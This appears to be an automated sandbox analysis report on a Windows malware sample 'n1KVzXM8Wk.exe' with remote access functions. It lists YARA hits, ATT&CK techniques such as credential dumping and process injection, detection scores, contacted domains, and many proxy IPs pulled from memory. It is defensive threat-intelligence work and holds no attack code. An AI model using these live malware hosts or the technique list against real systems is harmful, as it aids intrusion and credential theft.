                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a408fd68.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2959651140.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2295238294.00000119A51F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2951796876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: n1KVzXM8Wk.exe PID: 6812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 20140, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a408fd68.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2959651140.000000000333E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2959651140.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2959651140.0000000003369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2295238294.00000119A51F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2951796876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: n1KVzXM8Wk.exe PID: 6812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 20140, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    3
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    Scheduled Task/Job
                    211
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    Logon Script (Windows)1
                    Scheduled Task/Job
                    1
                    Timestomp
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    11
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model21
                    Input Capture
                    3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Masquerading
                    LSA Secrets1
                    Process Discovery
                    SSH1
                    Clipboard Data
                    14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                    Process Injection
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    n1KVzXM8Wk.exe21%ReversingLabsWin64.Trojan.Generic
                    n1KVzXM8Wk.exe24%VirustotalBrowse
                    n1KVzXM8Wk.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    bananasnevis.com0%VirustotalBrowse
                    ktxcomay.com.vn0%VirustotalBrowse
                    heygirlisheeverythingyouwantedinaman.com21%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_0%URL Reputationsafe
                    http://183.89.45.167:8080://proxy0%Avira URL Cloudsafe
                    http://178.33.163.156:42380://proxy0%Avira URL Cloudsafe
                    http://170.210.121.190:8080://proxy0%Avira URL Cloudsafe
                    http://167.99.219.173:8118://proxy0%VirustotalBrowse
                    http://183.89.45.167:8080://proxy0%VirustotalBrowse
                    http://167.99.219.173:8118://proxy0%Avira URL Cloudsafe
                    http://170.210.121.190:8080://proxy2%VirustotalBrowse
                    http://176.113.73.99:31280%Avira URL Cloudsafe
                    http://104.21.6.88:800%Avira URL Cloudsafe
                    http://38.242.136.254:19700%Avira URL Cloudsafe
                    http://64.124.191.98:326880%Avira URL Cloudsafe
                    http://38.242.136.254:19703%VirustotalBrowse
                    http://127.0.0.7:800%Avira URL Cloudsafe
                    http://38.7.1.233:9990%Avira URL Cloudsafe
                    http://188.164.193.178:307440%Avira URL Cloudsafe
                    http://178.33.163.156:42380://proxy2%VirustotalBrowse
                    http://102.36.127.249:1080://proxy0%Avira URL Cloudsafe
                    http://127.0.0.7:800%VirustotalBrowse
                    http://172.67.255.224://proxy0%Avira URL Cloudsafe
                    http://178.212.48.80:80800%Avira URL Cloudsafe
                    http://102.36.127.249:1080://proxy0%VirustotalBrowse
                    http://72.10.160.90:39130%Avira URL Cloudsafe
                    http://103.146.196.97:326500%Avira URL Cloudsafe
                    http://72.10.160.90:39131%VirustotalBrowse
                    http://104.21.6.88:800%VirustotalBrowse
                    http://188.164.193.178:3074411%VirustotalBrowse
                    http://123.59.100.243:1080://proxy0%Avira URL Cloudsafe
                    http://38.7.1.233:9990%VirustotalBrowse
                    http://64.124.191.98:326882%VirustotalBrowse
                    http://103.146.196.97:326501%VirustotalBrowse
                    http://41.65.251.85:1981://proxy0%Avira URL Cloudsafe
                    http://178.212.48.80:80802%VirustotalBrowse
                    http://107.180.95.177:63951://proxy0%Avira URL Cloudsafe
                    http://161.97.173.42:378620%Avira URL Cloudsafe
                    http://195.30.84.211:34090://proxy0%Avira URL Cloudsafe
                    http://176.113.73.99:31281%VirustotalBrowse
                    http://46.101.19.131://proxy0%Avira URL Cloudsafe
                    http://103.28.121.58:3128://proxy0%Avira URL Cloudsafe
                    http://41.65.251.85:1981://proxy1%VirustotalBrowse
                    http://123.59.100.243:1080://proxy3%VirustotalBrowse
                    http://161.97.173.42:378624%VirustotalBrowse
                    http://58.182.138.139://proxy0%Avira URL Cloudsafe
                    http://184.178.172.25:152910%Avira URL Cloudsafe
                    http://103.28.121.58:3128://proxy2%VirustotalBrowse
                    http://50.169.135.10:800%Avira URL Cloudsafe
                    http://8.213.129.20:3128://proxy0%Avira URL Cloudsafe
                    http://185.161.186.82:54321://proxy0%Avira URL Cloudsafe
                    http://200.108.234.105:8080://proxy0%Avira URL Cloudsafe
                    http://195.30.84.211:34090://proxy2%VirustotalBrowse
                    http://68.183.232.4:31280%Avira URL Cloudsafe
                    http://107.180.95.177:63951://proxy3%VirustotalBrowse
                    http://178.49.14.57:3128://proxy0%Avira URL Cloudsafe
                    http://192.140.42.83:31511100%Avira URL Cloudmalware
                    http://67.43.227.227:11190%Avira URL Cloudsafe
                    http://41.174.152.29:123910%Avira URL Cloudsafe
                    http://190.14.215.130:8080://proxy0%Avira URL Cloudsafe
                    http://72.10.164.178:48930%Avira URL Cloudsafe
                    http://36.92.111.49:52471://proxy0%Avira URL Cloudsafe
                    http://203.128.77.213:333780%Avira URL Cloudsafe
                    http://67.43.227.228:57690%Avira URL Cloudsafe
                    http://45.117.179.179:331640%Avira URL Cloudsafe
                    http://154.12.253.232:251580%Avira URL Cloudsafe
                    http://102.216.69.176:8080://proxy0%Avira URL Cloudsafe
                    http://154.202.124.75:31280%Avira URL Cloudsafe
                    http://150.230.207.167:800%Avira URL Cloudsafe
                    http://192.169.244.80:41568://proxy0%Avira URL Cloudsafe
                    http://173.225.192.5:10800%Avira URL Cloudsafe
                    http://202.159.60.113:4430%Avira URL Cloudsafe
                    http://104.165.127.198:3128://proxy0%Avira URL Cloudsafe
                    http://54.38.179.203:350320%Avira URL Cloudsafe
                    http://178.79.165.164:550140%Avira URL Cloudsafe
                    http://91.134.140.160:27207://proxy0%Avira URL Cloudsafe
                    http://190.242.126.170:9990%Avira URL Cloudsafe
                    http://72.10.160.170:5385://proxy0%Avira URL Cloudsafe
                    http://78.40.104.5:10800%Avira URL Cloudsafe
                    http://190.120.254.233:9990%Avira URL Cloudsafe
                    http://117.54.114.101://proxy0%Avira URL Cloudsafe
                    http://202.12.80.11:830%Avira URL Cloudsafe
                    http://115.127.114.209:5020://proxy0%Avira URL Cloudsafe
                    http://203.110.145.82:631280%Avira URL Cloudsafe
                    http://149.28.141.180:652010%Avira URL Cloudsafe
                    http://149.202.172.1130%Avira URL Cloudsafe
                    http://67.43.236.20:327030%Avira URL Cloudsafe
                    http://103.113.71.230:10800%Avira URL Cloudsafe
                    http://162.214.163.137:7070://proxy0%Avira URL Cloudsafe
                    http://188.166.252.135:8080://proxy0%Avira URL Cloudsafe
                    http://51.210.45.148:38650%Avira URL Cloudsafe
                    http://13.234.24.116:31280%Avira URL Cloudsafe
                    http://46.21.153.16:3128://proxy0%Avira URL Cloudsafe
                    http://123.13.218.68:90020%Avira URL Cloudsafe
                    http://31.43.52.176:41890://proxy0%Avira URL Cloudsafe
                    http://103.216.51.36:326500%Avira URL Cloudsafe
                    http://149.126.101.162:8080://proxy0%Avira URL Cloudsafe
                    http://179.57.172.172:9990%Avira URL Cloudsafe
                    http://198.12.253.117:322290%Avira URL Cloudsafe
                    http://202.6.233.59:7878://proxy0%Avira URL Cloudsafe
                    http://5.42.81.57:34448://proxy0%Avira URL Cloudsafe
                    http://184.178.172.14:4145://proxy0%Avira URL Cloudsafe
                    http://201.158.10.64:56780%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bananasnevis.com
                    64.202.191.120
                    truefalseunknown
                    ktxcomay.com.vn
                    222.255.238.159
                    truefalseunknown
                    github.com
                    140.82.114.3
                    truefalse
                      high
                      repository.gij.edu.gh
                      102.223.20.217
                      truefalse
                        unknown
                        heygirlisheeverythingyouwantedinaman.com
                        172.67.190.93
                        truefalseunknown
                        mail.bananasnevis.com
                        unknown
                        unknowntrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://178.33.163.156:42380://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://38.242.136.254:1970n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A4A6000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://170.210.121.190:8080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994399000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://183.89.45.167:8080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119966B9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://167.99.219.173:8118://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A947000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://176.113.73.99:3128n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993EE7000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://104.21.6.88:80n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995457000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://64.124.191.98:32688n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995019000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199523F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.7:80n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://188.164.193.178:30744n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 11%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://38.7.1.233:999n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA9D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://102.36.127.249:1080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://172.67.255.224://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://178.212.48.80:8080n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011999E8E000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A760000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://72.10.160.90:3913n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199686E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://103.146.196.97:32650n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://123.59.100.243:1080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://41.65.251.85:1981://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011999493000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://107.180.95.177:63951://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A02E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://161.97.173.42:37862n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A947000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 4%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://195.30.84.211:34090://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://46.101.19.131://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199491A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://103.28.121.58:3128://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995922000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          low
                          http://58.182.138.139://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199496B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://184.178.172.25:15291n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://50.169.135.10:80n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://8.213.129.20:3128://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119985A8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://200.108.234.105:8080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://185.161.186.82:54321://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://178.49.14.57:3128://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://68.183.232.4:3128n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995457000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://192.140.42.83:31511n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://41.174.152.29:12391n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119997D8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://67.43.227.227:1119n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://190.14.215.130:8080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://36.92.111.49:52471://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://72.10.164.178:4893n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994480000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A760000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://203.128.77.213:33378n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://67.43.227.228:5769n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119942A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://45.117.179.179:33164n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994A69000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://154.12.253.232:25158n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995AEF000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995C92000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://102.216.69.176:8080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://154.202.124.75:3128n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994DB5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://150.230.207.167:80n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011999A4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://192.169.244.80:41568://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://173.225.192.5:1080n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://202.159.60.113:443n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://104.165.127.198:3128://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996980000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://54.38.179.203:35032n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://178.79.165.164:55014n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199447A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.134.140.160:27207://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994B82000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://190.242.126.170:999n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://72.10.160.170:5385://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://78.40.104.5:1080n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994246000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://190.120.254.233:999n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119942A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://117.54.114.101://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://202.12.80.11:83n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996AD0000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://115.127.114.209:5020://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119950E3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://203.110.145.82:63128n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199496B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://149.202.172.113n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119950E3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://149.28.141.180:65201n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994A6C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://103.113.71.230:1080n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://67.43.236.20:32703n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199537B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://162.214.163.137:7070://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://188.166.252.135:8080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199404A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://51.210.45.148:3865n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994EAA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://13.234.24.116:3128n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994016000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://46.21.153.16:3128://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://123.13.218.68:9002n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119997D8000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A888000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://31.43.52.176:41890://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://103.216.51.36:32650n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://149.126.101.162:8080://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995096000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://179.57.172.172:999n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA4C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://198.12.253.117:32229n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993FB6000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994246000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://5.42.81.57:34448://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://202.6.233.59:7878://proxyn1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
